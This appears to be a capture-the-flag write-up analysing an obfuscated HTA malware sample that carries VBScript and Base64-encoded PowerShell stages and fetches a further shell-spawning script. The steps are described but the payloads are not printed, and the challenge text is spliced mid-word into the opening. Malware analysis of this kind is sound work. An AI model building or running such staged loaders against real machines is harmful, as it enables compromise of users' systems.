A routine patrol through the Frontier Cluster's shadowy corners uncovered a sinister file embedded in a bounty report—one targeting Jack Colt himself. The file’s obfuscated layers suggest it's more than a simple message; it’s a weaponized codNote: Ensure all domains discovered in the challenge resolve to your Docker instance, including the appropriate port when accessing URLs.e from the Frontier Board, aiming to tighten their grip on the stars. As a trusted ally, it's your task to peel back the layers of deception trace its origin, and turn their tools against them. Every domain found in the challenge should resolve to your docker instance. Do not forget to add the port when visiting the URLs.
We are given a heavily obfuscated HTA file to solve and an IP that is useless for now. I used CyberChef to clean this up a bit to see the contents of the file.
From that, we can see that there is a VBScript hidden inside. But if we scroll a bit more, we can see a Powershell script encoded using Base64.
After decoding the Base64 string, I found a URL that is storing another VBScript file. Since the domain doesn't exist, this must be the hostname for the IP that we are given.
After changing my /etc/hoststo use that hostname and the provided IP, I can now download the wanted.tIFfile. It's a long file but there is one interesting part of the code where it spawns a shell.
Since I am a bit too lazy to reverse this, let's just run it with the running part removed. The value of the sandareso variable is yet another powershell command encoded using Base64.